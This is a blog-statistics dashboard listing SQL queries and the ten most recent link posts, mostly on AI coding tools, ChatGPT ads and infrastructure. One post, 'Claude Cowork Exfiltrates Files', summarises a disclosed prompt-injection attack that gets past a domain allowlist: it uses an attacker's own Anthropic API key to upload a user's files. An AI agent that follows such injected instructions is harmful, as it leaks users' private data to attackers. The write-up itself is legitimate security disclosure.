Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3261

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8241

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1319

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by count(*) desc

Ten most recent blogmarks (of 8241 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

link_title link_url commentary created
Electricity use of AI coding agents https://www.simonpcouch.com/blog/2026-01-20-cc-impact/ Previous work estimating the energy and water cost of LLMs has generally focused on the cost per prompt using a consumer-level system such as ChatGPT. Simon P. Couch notes that coding agents such as Claude Code use *way* more tokens in response to tasks, often burning through many thousands of tokens of many tool calls. As a heavy Claude Code user, Simon estimates his own usage at the equivalent of 4,400 "typical queries" to an LLM, for an equivalent of around $15-$20 in daily API token spend. He figures that to be about the same as running a dishwasher once or the daily energy used by a domestic refrigerator. 2026-01-20 23:11:57+00:00
Giving University Exams in the Age of Chatbots https://ploum.net/2026-01-19-exam-with-chatbots.html Detailed and thoughtful description of an open-book and open-chatbot exam run by [Ploum](https://fr.wikipedia.org/wiki/Lionel_Dricot) at École Polytechnique de Louvain for an "Open Source Strategies" class. Students were told they could use chatbots during the exam but they had to announce their intention to do so in advance, share their prompts and take full accountability for any mistakes they made. Only 3 out of 60 students chose to use chatbots. Ploum surveyed half of the class to help understand their motivations. 2026-01-20 17:51:17+00:00
jordanhubbard/nanolang https://github.com/jordanhubbard/nanolang Plenty of people have mused about what a new programming language specifically designed to be used by LLMs might look like. Jordan Hubbard ([co-founder of FreeBSD](https://en.wikipedia.org/wiki/Jordan_Hubbard), with serious stints at Apple and NVIDIA) just released exactly that. > A minimal, LLM-friendly programming language with mandatory testing and unambiguous syntax. > > NanoLang transpiles to C for native performance while providing a clean, modern syntax optimized for both human readability and AI code generation. The syntax strikes me as an interesting mix between C, Lisp and Rust. I decided to see if an LLM could produce working code in it directly, given the necessary context. I started with this [MEMORY.md](https://github.com/jordanhubbard/nanolang/blob/main/MEMORY.md) file, which begins: > **Purpose:** This file is designed specifically for Large Language Model consumption. It contains the essential knowledge needed to generate, debug, and understand NanoLang code. Pair this with `spec.json` for complete language coverage. I ran that using [LLM](https://llm.datasette.io/) and [llm-anthropic](https://github.com/simonw/llm-anthropic) like this: llm -m claude-opus-4.5 \ -s https://raw.githubusercontent.com/jordanhubbard/nanolang/refs/heads/main/MEMORY.md \ 'Build me a mandelbrot fractal CLI tool in this language' > /tmp/fractal.nano The [resulting code](https://gist.github.com/simonw/7847f022566d11629ec2139f1d109fb8#mandelbrot-fractal-cli-tool-in-nano)... [did not compile](https://gist.github.com/simonw/7847f022566d11629ec2139f1d109fb8?permalink_comment_id=5947465#gistcomment-5947465). I may have been too optimistic expecting a one-shot working program for a new language like this. So I ran a clone of the actual project, copied in my program and had Claude Code take a look at the failing compiler output. ... and it worked! Claude happily grepped its way through the various `examples/` and built me a working program. Here's [the Claude Code transcript](https://gisthost.github.io/?9696da6882cb6596be6a9d5196e8a7a5/index.html) - you can see it [reading relevant examples here](https://gisthost.github.io/?9696da6882cb6596be6a9d5196e8a7a5/page-001.html#msg-2026-01-19T23-43-09-675Z) - and here's [the finished code plus its output](https://gist.github.com/simonw/e7f3577adcfd392ab7fa23b1295d00f2). I've suspected [for a while](https://simonwillison.net/2025/Nov/7/llms-for-new-programming-languages/) that LLMs and coding agents might significantly reduce the friction involved in launching a new language. This result reinforces my opinion. 2026-01-19 23:58:56+00:00
Scaling long-running autonomous coding https://cursor.com/blog/scaling-agents Wilson Lin at Cursor has been doing some experiments to see how far you can push a large fleet of "autonomous" coding agents: > This post describes what we've learned from running hundreds of concurrent agents on a single project, coordinating their work, and watching them write over a million lines of code and trillions of tokens. They ended up running planners and sub-planners to create tasks, then having workers execute on those tasks - similar to how Claude Code uses sub-agents. Each cycle ended with a judge agent deciding if the project was completed or not. In my predictions for 2026 [the other day](https://simonwillison.net/2026/Jan/8/llm-predictions-for-2026/#3-years-someone-will-build-a-new-browser-using-mainly-ai-assisted-coding-and-it-won-t-even-be-a-surprise) I said that by 2029: > I think somebody will have built a full web browser mostly using AI assistance, and it won’t even be surprising. Rolling a new web browser is one of the most complicated software projects I can imagine[...] the cheat code is the conformance suites. If there are existing tests that it’ll get so much easier. I may have been off by three years, because Cursor chose "building a web browser from scratch" as their test case for their agent swarm approach: > To test this system, we pointed it at an ambitious goal: building a web browser from scratch. The agents ran for close to a week, writing over 1 million lines of code across 1,000 files. You can explore [the source code on GitHub](https://github.com/wilsonzlin/fastrender). But how well did they do? Their initial announcement a couple of days ago was met with [unsurprising skepticism](https://embedding-shapes.github.io/cursor-implied-success-without-evidence/), especially when it became apparent that their GitHub Actions CI was failing and there were no build instructions in the repo. It looks like they addressed that within the past 24 hours. The [latest README](https://github.com/wilsonzlin/fastrender/blob/main/README.md#build-requirements) includes build instructions which I followed on macOS like this: cd /tmp git clone https://github.com/wilsonzlin/fastrender cd fastrender git submodule update --init vendor/ecma-rs cargo run --release --features browser_ui --bin browser This got me a working browser window! Here are screenshots I took of google.com and my own website: ![The browser chrome is neat but has a garbled tab name at the top. The Google homepage looks mostly correct but the buttons are not styled correctly and the Google Search one has a huge plus icon floating near it.](https://static.simonwillison.net/static/2026/cursor-google.png) ![My blog looks mostly correct, but the right closing quotation mark on a quotation (which is implemented as a background image on the final paragraph) is displayed incorrectly multiple times.](https://static.simonwillison.net/static/2026/cursor-simonwillison.jpg) Honestly those are very impressive! You can tell they're not just wrapping an existing rendering engine because of those very obvious rendering glitches, but the pages are legible and look mostly correct. The FastRender repo even uses Git submodules [to include various WhatWG and CSS-WG specifications](https://github.com/wilsonzlin/fastrender/tree/main/specs) in the repo, which is a smart way to make sure the agents have access to the reference materials that they might need. This is the second attempt I've seen at building a full web browser using AI-assisted coding in the past two weeks - the first was [HiWave browser](https://github.com/hiwavebrowser/hiwave), a new browser engine in Rust first announced [in this Reddit thread](https://www.reddit.com/r/Anthropic/comments/1q4xfm0/over_christmas_break_i_wrote_a_fully_functional/). When I made my 2029 prediction this is more-or-less the quality of result I had in mind. I don't think we'll see projects of this nature compete with Chrome or Firefox or WebKit any time soon but I have to admit I'm very surprised to see something this capable emerge so quickly. 2026-01-19 05:12:51+00:00
FLUX.2-klein-4B Pure C Implementation https://github.com/antirez/flux2.c On 15th January Black Forest Labs, a lab formed by the creators of the original Stable Diffusion, released [black-forest-labs/FLUX.2-klein-4B](https://huggingface.co/black-forest-labs/FLUX.2-klein-4B) - an Apache 2.0 licensed 4 billion parameter version of their FLUX.2 family. Salvatore Sanfilippo (antirez) decided to build a pure C and dependency-free implementation to run the model, with assistance from Claude Code and Claude Opus 4.5. Salvatore shared [this note](https://news.ycombinator.com/item?id=46670279#46671233) on Hacker News: > Something that may be interesting for the reader of this thread: this project was possible only once I started to tell Opus that it *needed* to take a file with all the implementation notes, and also accumulating all the things we discovered during the development process. And also, the file had clear instructions to be taken updated, and to be processed ASAP after context compaction. This kinda enabled Opus to do such a big coding task in a reasonable amount of time without loosing track. Check the file IMPLEMENTATION_NOTES.md in the GitHub repo for more info. Here's that [IMPLEMENTATION_NOTES.md](https://github.com/antirez/flux2.c/blob/main/IMPLEMENTATION_NOTES.md) file. 2026-01-18 23:58:58+00:00
Our approach to advertising and expanding access to ChatGPT https://openai.com/index/our-approach-to-advertising-and-expanding-access/ OpenAI's long-rumored introduction of ads to ChatGPT just became a whole lot more concrete: > In the coming weeks, we’re also planning to start testing ads in the U.S. for the free and Go tiers, so more people can benefit from our tools with fewer usage limits or without having to pay. Plus, Pro, Business, and Enterprise subscriptions will not include ads. What's "Go" tier, you might ask? That's a new $8/month tier that launched today in the USA, see [Introducing ChatGPT Go, now available worldwide](https://openai.com/index/introducing-chatgpt-go/). It's a tier that they first trialed in India in August 2025 (here's a mention [in their release notes from August](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#h_22cae6eb9f) listing a price of ₹399/month, which converts to around $4.40). I'm finding the new plan comparison grid on [chatgpt.com/pricing](https://chatgpt.com/pricing) pretty confusing. It lists all accounts as having access to GPT-5.2 Thinking, but doesn't clarify the limits that the free and Go plans have to conform to. It also lists different context windows for the different plans - 16K for free, 32K for Go and Plus and 128K for Pro. I had assumed that the 400,000 token window [on the GPT-5.2 model page](https://platform.openai.com/docs/models/gpt-5.2) applied to ChatGPT as well, but apparently I was mistaken. **Update**: I've apparently not been paying attention: here's the Internet Archive ChatGPT pricing page from [September 2025](https://web.archive.org/web/20250906071408/https://chatgpt.com/pricing) showing those context limit differences as well. Back to advertising: my biggest concern has always been whether ads will influence the output of the chat directly. OpenAI assure us that they will not: > - **Answer independence**: Ads do not influence the answers ChatGPT gives you. Answers are optimized based on what's most helpful to you. Ads are always separate and clearly labeled. > - **Conversation privacy**: We keep your conversations with ChatGPT private from advertisers, and we never sell your data to advertisers. So what will they look like then? This screenshot from the announcement offers a useful hint: ![Two iPhone screenshots showing ChatGPT mobile app interface. Left screen displays a conversation about Santa Fe, New Mexico with an image of adobe-style buildings and desert landscape, text reading "Santa Fe, New Mexico—often called 'The City Different'—is a captivating blend of history, art, and natural beauty at the foot of the Sangre de Cristo Mountains. As the oldest and highest-elevation state capital in the U.S., founded in 1610, it offers a unique mix of Native American, Spanish, and Anglo cultures." Below is a sponsored section from "Pueblo & Pine" showing "Desert Cottages - Expansive residences with desert vistas" with a thumbnail image, and a "Chat with Pueblo & Pine" button. Input field shows "Ask ChatGPT". Right screen shows the Pueblo & Pine chat interface with the same Desert Cottages listing and an AI response "If you're planning a trip to Sante Fe, I'm happy to help. When are you thinking of going?" with input field "Ask Pueblo & Pine" and iOS keyboard visible.](https://static.simonwillison.net/static/2026/chatgpt-ads.jpg) The user asks about trips to Santa Fe, and an ad shows up for a cottage rental business there. This particular example imagines an option to start a direct chat with a bot aligned with that advertiser, at which point presumably the advertiser can influence the answers all they like! 2026-01-16 21:28:26+00:00
Open Responses https://www.openresponses.org/ This is the standardization effort I've most wanted in the world of LLMs: a vendor-neutral specification for the JSON API that clients can use to talk to hosted LLMs. Open Responses aims to provide exactly that as a documented standard, derived from OpenAI's Responses API. I was hoping for one based on their older Chat Completions API since so many other products have cloned the already, but basing it on Responses does make sense since that API was designed with the feature of more recent models - such as reasoning traces - baked into the design. What's certainly notable is the list of launch partners. OpenRouter alone means we can expect to be able to use this protocol with almost every existing model, and Hugging Face, LM Studio, vLLM, Ollama and Vercel cover a huge portion of the common tools used to serve models. For protocols like this I really want to see a comprehensive, language-independent conformance test site. Open Responses has a subset of that - the official repository includes [src/lib/compliance-tests.ts](https://github.com/openresponses/openresponses/blob/d0f23437b27845d5c3d0abaf5cb5c4a702f26b05/src/lib/compliance-tests.ts) which can be used to exercise a server implementation, and is available as a React app [on the official site](https://www.openresponses.org/compliance) that can be pointed at any implementation served via CORS. What's missing is the equivalent for clients. I plan to spin up my own client library for this in Python and I'd really like to be able to run that against a conformance suite designed to check that my client correctly handles all of the details. 2026-01-15 23:56:56+00:00
The Design & Implementation of Sprites https://fly.io/blog/design-and-implementation/ I [wrote about Sprites last week](https://simonwillison.net/2026/Jan/9/sprites-dev/) Here's Thomas Ptacek from Fly with the insider details on how they work under the hood. I like this framing of them as "disposable computers": > Sprites are ball-point disposable computers. Whatever mark you mean to make, we’ve rigged it so you’re never more than a second or two away from having a Sprite to do it with. I've noticed that new Fly Machines can take a while (up to around a minute) to provision. Sprites solve that by keeping warm pools of unused machines in multiple regions, which is enabled by them all using the same container: > Now, today, under the hood, Sprites are still Fly Machines. But they all run from a standard container. Every physical worker knows exactly what container the next Sprite is going to start with, so it’s easy for us to keep pools of “empty” Sprites standing by. The result: a Sprite create doesn’t have any heavy lifting to do; it’s basically just doing the stuff we do when we start a Fly Machine. The most interesting detail is how the persistence layer works. Sprites only charge you for data you have written that differs from the base image and provide ~300ms checkpointing and restores - it turns out that's power by a custom filesystem on top of S3-compatible storage coordinated by Litestream-replicated local SQLite metadata: > We still exploit NVMe, but not as the root of storage. Instead, it’s a read-through cache for a blob on object storage. S3-compatible object stores are the most trustworthy storage technology we have. I can feel my blood pressure dropping just typing the words “Sprites are backed by object storage.” [...] > > The Sprite storage stack is organized around the JuiceFS model (in fact, we currently use a very hacked-up JuiceFS, with a rewritten SQLite metadata backend). It works by splitting storage into data (“chunks”) and metadata (a map of where the “chunks” are). Data chunks live on object stores; metadata lives in fast local storage. In our case, that metadata store is [kept durable with Litestream](https://litestream.io). Nothing depends on local storage. 2026-01-15 16:08:27+00:00
Claude Cowork Exfiltrates Files https://www.promptarmor.com/resources/claude-cowork-exfiltrates-files Claude Cowork defaults to allowing outbound HTTP traffic to only a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data. Prompt Armor found a creative workaround: Anthropic's API domain is on that list, so they constructed an attack that includes an attacker's own Anthropic API key and has the agent upload any files it can see to the `https://api.anthropic.com/v1/files` endpoint, allowing the attacker to retrieve their content later. 2026-01-14 22:15:22+00:00
Anthropic invests $1.5 million in the Python Software Foundation and open source security https://pyfound.blogspot.com/2025/12/anthropic-invests-in-python.html?m=1 This is outstanding news, especially given our decision to withdraw from that NSF grant application [back in October](https://simonwillison.net/2025/Oct/27/psf-withdrawn-proposal/). > We are thrilled to announce that Anthropic has entered into a two-year partnership with the Python Software Foundation (PSF) to contribute a landmark total of $1.5 million to support the foundation’s work, with an emphasis on Python ecosystem security. This investment will enable the PSF to make crucial security advances to CPython and the Python Package Index (PyPI) benefiting all users, and it will also sustain the foundation’s core work supporting the Python language, ecosystem, and global community. Note that while security is a focus these funds will also support other aspects of the PSF's work: > Anthropic’s support will also go towards the PSF’s core work, including the Developer in Residence program driving contributions to CPython, community support through grants and other programs, running core infrastructure such as PyPI, and more. 2026-01-13 23:58:17+00:00
Copy and export data

Duration: 3.86ms